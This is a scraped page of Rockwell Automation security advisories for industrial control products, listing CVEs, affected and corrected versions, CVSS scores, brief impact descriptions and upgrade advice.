
Affected Product	CVE	Affected Software Version	Corrected in Software Version
FactoryTalk Activation Manager	CVE-2025-7970	5.00 - 5.01	5.02

Security Issue Details

Category	Details
CVE ID	CVE-2025-7970
Impact	A security issue exists within FactoryTalk Activation Manager. An error in the implementation of cryptography within the software could allow attackers to decrypt traffic. This could result in data exposure, session hijacking, or full communication compromise.
CVSS 3.1 Base Score	7.5/10
CVSS 4.0 Base Score	8.7/10
CWEs	CWE-303: Incorrect Implementation of Authentication Algorithm
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	September 9, 2025	Initial release

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer
ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1742 | FactoryTalk Optix Remote Code Execution Vulnerability

Published Date:

September 09, 2025

Last Updated:

September 05, 2025

CVE IDs:

CVE-2025-9161

Products:

FactoryTalk Optix

CVSS Scores (v3.1):

7.1

CVSS Scores (v4.0):

7.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

FactoryTalk Optix Remote Code Execution Vulnerability

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

FactoryTalk Optix is a scalable, cloud-enabled visualization platform that lets you design, test, and deploy HMI applications across devices with modern templates, built-in collaboration tools, and OPC UA-based interoperability

Affected products and solution

Affected Product	CVE	Affected Software Version	Corrected in Software Version
FactoryTalk Optix	CVE-2025-9161	All Versions 1.5.0 - 1.5.7	1.6.0

Security Issue Details

Category	Details
CVE ID	CVE-2025-9161
Impact	A security issue exists within FactoryTalk Optix MQTT broker due to the lack of URI sanitization. This flaw enables the loading of remote Mosquito plugins, which can be used to achieve remote code execution.
CVSS 3.1 Base Score	7.1/10
CVSS 4.0 Base Score	7.3/10
CWEs	CWE-20: Improper Input Validation
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	September 9, 2025	Initial release

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

Critical

SD1735 | FactoryTalk® Linx Network Browser Security Bypass Vulnerability

Published Date:

August 14, 2025

Last Updated:

August 14, 2025

CVE IDs:

CVE-2025-7972

Products:

FactoryTalk Linx

CVSS Scores (v3.1):

9.0

CVSS Scores (v4.0):

8.4

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 8/14/2025
Last Updated: 8/14/2025
Revision Number: 1.0
CVSS Score: 9.0/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	Affected Software Versions	Corrected in Software Version
FactoryTalk Linx	CVE-2025-7972	All prior to 6.50	6.50 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-7972 IMPACT

A security issue exists within the FactoryTalk Linx Network Browser. By modifying the process.env.NODE_ENV to ‘development’, the attacker can disable FTSP token validation. This bypass allows access to create, update, and delete FTLinx drivers.

CVSS 3.1 Base Score: 9.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H

CVSS 4.0 Base Score: 8.4
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H

CWE: CWE-286: Incorrect User Management
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.

Security Best Practices

Glossary:

FTSP: (FactoryTalk Services Platform) facilitates communication between FactoryTalk® components, enabling data exchange and interaction across computers in a FactoryTalk directory

High

SD1737 | FLEX 5000 I/O - Module Fault

Published Date:

August 14, 2025

Last Updated:

August 14, 2025

CVE IDs:

CVE-2025-9041, CVE-2025-9042

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 8/14/2025

Last Updated: 8/14/2025
Revision Number: 1.0
CVSS Score: See below

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

First Known in Firmware Version

Corrected in Firmware Version

5094-IF8

CVE-2025-9041

V2.011

V2.012 and later

5094-IY8

CVE-2025-9042

V2.011

V2.012 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-9041

A security issue exists due to improper handling of CIP Class 32’s request when a module is inhibited on the 5094-IF8 device. It causes the module to enter a fault state with the Module LED flashing red. Upon un-inhibiting, the module returns a connection fault (Code 16#0010), and the module cannot recover without a power cycle.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CVE-2025-9042

A security issue exists due to improper handling of CIP Class 32’s request when a module is inhibited on the 5094-IY8 device. It causes the module to enter a fault state with the Module LED flashing red. Upon un-inhibiting, the module returns a connection fault (Code 16#0010), and the module cannot recover without a power cycle.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1287: Improper Validation of Specified Type of Input
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied. 

        Security Best Practices

Glossary:

CIP: Common Industrial Protocol (CIP) is a common communication standard that is widely used in industrial automation. Comprises a series of protocols for communication between different devices and systems in automation technology

Module: A self-contained unit within a system that performs a specific function and can operate independently or as part of a larger system

Inhibited: Temporarily disabled or prevented from operating.

High

SD1734 | Studio 5000 Logix Designer® – Arbitrary Code Execution Vulnerability

Published Date:

August 14, 2025

Last Updated:

August 14, 2025

CVE IDs:

CVE-2025-7971

Products:

Studio 5000 Logix Designer

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

7.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 8/14/2025
Last Updated: 8/14/2025
Revision Number: 1.0
CVSS Score: 7.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	First Known in Software Version	Corrected in Software Version
Studio 5000 Logix Designer	CVE-2025-7971	36.00.02	V37.00.02

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-7971 IMPACT

A security issues exists within Studio 5000 Logix Designer due to unsafe handling of environment variables. If the specified path lacks a valid file, Logix Designer crashes; However, it may be possible to execute malicious code without triggering a crash.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.

Security Best Practices

Critical

SD1736 | Micro800 – Multiple Vulnerabilities

Published Date:

August 14, 2025

Last Updated:

August 14, 2025

Products:

Micro800

CVSS Scores (v3.1):

9.8

CVSS Scores (v4.0):

9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 8/14/2025
Last Updated: 8/14/2025
Revision Number: 1.0
CVSS Score: 9.8/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

CVE

Affected Product

First Known in Software Version

Corrected in Software Version

CVE-2023-48691

PLC Micro820 LC20

V14.011 and below

Migrate to Micro820 L20E V 23.011 and later (this has yet to be released, target to release in Sept 2025)

PLC Micro850 LC50

V12.013 and below

Migrate to Micro850 L50E V 23.011 and later

PLC Micro870 LC70

V12.013 and below

Migrate to Micro870 L70E V 23.011 and later

PLC - Micro850 L50E

V20.011 - V22.011

V23.011 and later

PLC – Micro870 L70E

V20.011 - V22.011

V23.011 and later

CVE-2023-48692

PLC Micro820 LC20

V14.011 and below

Migrate to Micro820 L20E V 23.011 and later (this has yet to be released, target to release in Sept 2025)

PLC Micro850 LC50

V12.013 and below

Migrate to Micro850 L50E V 23.011 and later

PLC Micro870 LC70

V12.013 and below

Migrate to Micro870 L70E V 23.011 and later

PLC - Micro850 L50E

V20.011 - V22.011

V23.011 and later

PLC – Micro870 L70E

V20.011 -V22.011

V23.011 and later

CVE-2023-48693

PLC Micro820 LC20

V14.011 and below

Migrate to Micro820 L20E V 23.011 and later (this has yet to be released, target to release in Sept 2025)

PLC Micro850 LC50

V12.013 and below

Migrate to Micro850 L50E V 23.011 and later

PLC Micro870 LC70

V12.013 and below

Migrate to Micro870 L70E V 23.011 and later

PLC - Micro850 L50E

V20.011 -V22.011

V23.011 and later

PLC – Micro870 L70E

V20.011 - V22.011

V23.011 and later

CVE-2025-7693

PLC - Micro850 L50E

V20.011 - V22.011

V23.011 and later

PLC – Micro870 L70E

V20.011 -V22.011

V23.011 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-48691 IMPACT

Azure RTOS NetX Duo is a TCP/IP network stack designed specifically for deeply embedded real-time and IoT applications. An attacker can cause an out-of-bounds write in Azure RTOS NETX Duo, that could lead to remote code execution. The affected components include a process related to IGMP protocol in RTOS v6.2.1 and below. The fix has been included in NetX Duo release 6.3.0. Users are advised to upgrade.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2023-48692 IMPACT

Azure RTOS NetX Duo is a TCP/IP network stack designed specifically for deeply embedded real-time and IoT applications. An attacker can cause remote code execution due to memory overflow vulnerabilities in Azure RTOS NETX Duo. The affected components include processes/functions related to icmp, tcp, snmp, dhcp, nat and ftp in RTOS v6.2.1 and below. The fixes have been included in NetX Duo release 6.3.0. Users are advised to upgrade.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2023-48693 IMPACT

Azure RTOS ThreadX is an advanced real-time operating system (RTOS) designed specifically for deeply embedded applications. An attacker can cause arbitrary read and write due to vulnerability in parameter checking mechanism in Azure RTOS ThreadX, which may lead to privilege escalation. The affected components include RTOS ThreadX v6.2.1 and below. The fixes have been included in ThreadX release 6.3.0. Users are advised to upgrade.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2025-7693 IMPACT

A security issue exists due to improper handling of malformed CIP Forward Close packets during fuzzing. The controller enters a solid red Fault LED state and becomes unresponsive. Upon power cycle, the controller will enter recoverable fault where the MS LED and Fault LED become flashing red and reports fault code 0xF015. To recover, clear the fault.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied. 

        Security Best Practices

Glossary:

TCP/IP: language computers use to talk to each other on a network or the internet

IoT: network of physical devices, like thermostat, fridge, or car

Remote Code Execution: allows attackers to run arbitrary code on a remote machine, connecting to it over public or private networks

IGMP:  (Internet Group Management Protocol) Used by IP hosts and adjacent routers to establish multicast group memberships.

ICMP:  (Internet Control Message Protocol) Used for sending error messages and operational information, such as when a service is unavailable or a host/router cannot be reached.

TCP: (Transmission Control Protocol) A connection-oriented protocol that ensures reliable data transmission between devices.

SNMP:  (Simple Network Management Protocol) Used for collecting and organizing information about managed devices on IP.

DHCP: (Dynamic Host Configuration Protocol) Automatically assigns IP addresses and other network configuration parameters to devices on a network, allowing them to communicate effectively.

NAT: (Network Address Translation) A method used to remap IP addresses by modifying network address information in packet headers.

FTP: (File Transfer Protocol) uses two primary ports for its operations: Port 21 and Port 20. These ports play distinct roles in facilitating file transfers between clients and servers.

Parameter: setting or value that helps define how data is transmitted, received, or managed across a network

CIP: (Common Industrial Protocol) a communication protocol designed for automation applications in industrial settings

Fuzzing: a technique that focuses on discovering vulnerabilities by providing a large amount of random and unexpected data inputs to a software system to trigger faults and find implementation bugs

High

SD1733 | ArmorBlock 5000 I/O – Web Server Vulnerabilities

Published Date:

August 14, 2025

Last Updated:

August 14, 2025

CVE IDs:

CVE-2025- 7773, CVE-2025- 7774

Products:

ArmorBlock 5000 I/O

CVSS Scores (v3.1):

8.6

CVSS Scores (v4.0):

8.8

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 8/14/2025
Last Updated: 8/14/2025
Revision Number: 1.0
CVSS Score: 8.6/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

First Known in Software Version

Corrected in Software Version

5032-CFGB16M12P5DR

5032-CFGB16M12DR

5032-CFGB16M12M12LDR

CVE-2025-7773

1.011

1.012

5032-CFGB16M12P5DR

5032-CFGB16M12DR

5032-CFGB16M12M12LDR

CVE-2025-7774

1.011

1.012

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025- 7773

A security issue exists within the 5032 16pt Digital Configurable module’s web server. The web server’s session number increments at an interval that correlates to the last two consecutive sign in session interval, making it predictable.

CVSS 3.1 Base Score: 8.6
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 8.8
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE: CWE-863: Incorrect Authorization
Known Exploited Vulnerability (KEV) database: No

CVE-2025- 7774

A security issue exists within the 5032 16pt Digital Configurable module’s web server. Intercepted session credentials can be used within a 3-minute timeout window, allowing unauthorized users to perform privileged actions.

CVSS 3.1 Base Score: 8.6
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 8.8
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE: CWE-306: Missing Authentication for Critical Function
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.

Security Best Practices

Critical

SD1732 | ControlLogix® Ethernet Remote Code Execution Vulnerability

Published Date:

August 14, 2025

Last Updated:

August 14, 2025

CVE IDs:

CVE-2025-7353

Products:

ControlLogix® Ethernet Modules

CVSS Scores (v3.1):

9.8

CVSS Scores (v4.0):

9.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 8/14/2025

Last Updated: 8/14/2025
Revision Number: 1.0
CVSS Score: 9.8/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	Affected Software Versions	Corrected in Software Version
1756-EN2T/D	CVE-2025-7353	Version 11.004 or below	12.001
1756-EN2F/C	CVE-2025-7353	Version 11.004 or below	12.001
1756-EN2TR/C	CVE-2025-7353	Version 11.004 or below	12.001
1756-EN3TR/B	CVE-2025-7353	Version 11.004 or below	12.001
1756-EN2TP/A	CVE-2025-7353	Version 11.004 or below	12.001

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-7353 IMPACT

A security issue exists due to the web-based debugger agent enabled on released devices. If a specific IP address is used to connect to the WDB agent, it can allow remote attackers to perform memory dumps, modify memory, and control execution flow.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1188: Initialization of a Resource with an Insecure Default
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.

·         Security Best Practices

High

SD1738 | FactoryTalk® ViewPoint Privilege Escalation Vulnerability

Published Date:

August 13, 2025

Last Updated:

August 13, 2025

CVE IDs:

CVE-2025-7973

Products:

FactoryTalk® ViewPoint

CVSS Scores (v3.1):

7.8

CVSS Scores (v4.0):

8.5

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 8/14/2025
Last Updated: 8/14/2025
Revision Number: 1.0
CVSS Score: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

Affected Software Version

Corrected in Software Version

FactoryTalk Viewpoint

CVE-2025-7973

Version 14.00 or below

15.00

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-7973 IMPACT

A security issue exists in FactoryTalk ViewPoint version 14.0 or below due to improper handling of MSI repair operations. During a repair, attackers can hijack the cscript.exe console window, which runs with SYSTEM privileges. This can be exploited to spawn an elevated command prompt, enabling full privilege escalation.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-268: Privilege Chaining
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.

Security Best Practices

Glossary:

MSI: Microsoft Installer (MSI) file is a package format used for installing, maintaining, and removing software on Windows systems.

Cscript.exe: command-line utility in Windows used to run scripts written in VBScript or JScript.

SYSTEM Privileges: SYSTEM privileges refer to the highest level of access on a Windows machine, allowing full control over all system resources and processes.

High

SD1740 | FactoryTalk® Action Manager v1.0.0 Runtime Vulnerability

Published Date:

August 13, 2025

Last Updated:

August 13, 2025

CVE IDs:

CVE-2025-7532

Products:

FactoryTalk Action Manager

CVSS Scores (v3.1):

7.8

CVSS Scores (v4.0):

8.5

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 8/14/2025
Last Updated: 8/14/2025
Revision Number: 1.0
CVSS Score: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

Affected Software Versions

Corrected in Software Version

FactoryTalk® Action Manager

CVE-2025-9036

1.0.0

1.01

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-9036 IMPACT

A security issue in the runtime event system allows unauthenticated connections to receive a reusable API token. This token is broadcasted over a WebSocket and can be intercepted by any local client listening on the connection.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: Exposure of Sensitive Information to an Unauthorized Actor
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.

·         Security Best Practices

Glossary:

API: (Application Programming Interface) is a set of protocols and tools that allow different software applications to communicate with each other

WebSocket: protocol used for communication between a client and a server over a single connection

High

SD1739 | 1756-EN4TR, EN4TRXT - Multiple Vulnerabilities

Published Date:

August 13, 2025

Last Updated:

August 13, 2025

CVE IDs:

CVE-2025-8007 , CVE-2025-8008

Products:

ControlLogix EtherNet/IP Network Devices

CVSS Scores (v3.1):

6.5

CVSS Scores (v4.0):

7.1

Revision Number:

2.0

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

1756-EN4TR, EN4TRXT - Multiple Vulnerabilities

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Product Description

The 1756-EN4TR, and 1756-EN4TRXT are high-performance ControlLogix EtherNet/IP communication modules that support advanced topologies like Device Level Ring and Parallel Redundancy Protocol, with scalable connection capacities and environmental ratings to meet standard, high-demand, and extreme industrial networking needs.

Affected products and solution

Affected Product

CVE

Affected Software Version

Corrected in Software Version

Affected Catalog Numbers

1756-EN4TR

1756-EN4TRXT

CVE-2025-8007

Version 6.001 or Prior

Version 7.001 or later

1756*

1756-EN4TR

1756-EN4TRXT

CVE-2025-8008

Version 6.001 or Prior

Version 7.001 or later

1756*

Security Issue Details

Category	Details
CVE ID	CVE-2025-8007
Impact	A security issue exists in the protected mode of 1756-EN4TR communication modules, where a Concurrent Forward Close operation can trigger a Major Non-Recoverable (MNFR) fault. This condition may lead to unexpected system crashes and loss of device availability.
CVSS 3.1 Base Score	6.5/10
CVSS 4.0 Base Score	7.1/10
CWEs	CWE-20: Improper Input Validation
Known Exploited Vulnerability	No (Not listed in KEV database)

Category	Details
CVE ID	CVE-2025-8008
Impact	A security issue exists in the protected mode of EN4TR devices, where sending specifically crafted messages during a Forward Close operation can cause the device to crash.
CVSS 3.1 Base Score	6.5/10
CVSS 4.0 Base Score	7.1/10
CWEs	CWE-755: Improper Handling of Exceptional Conditions
Known Exploited Vulnerability	No (Not listed in KEV database)

Glossary:

· Major Non-Recoverable: critical fault condition within industrial control systems

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	September 9, 2025	Initial release

2.0

September 15, 2025

Affected Product Update

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1731 | Arena® Simulation Multiple Memory Corruption Vulnerabilities

Published Date:

August 05, 2025

Last Updated:

August 05, 2025

CVE IDs:

CVE-2025-7025, CVE-2025-7032, CVE-2025-7033

Products:

Arena® Simulation

CVSS Scores (v3.1):

7.8

CVSS Scores (v4.0):

8.4

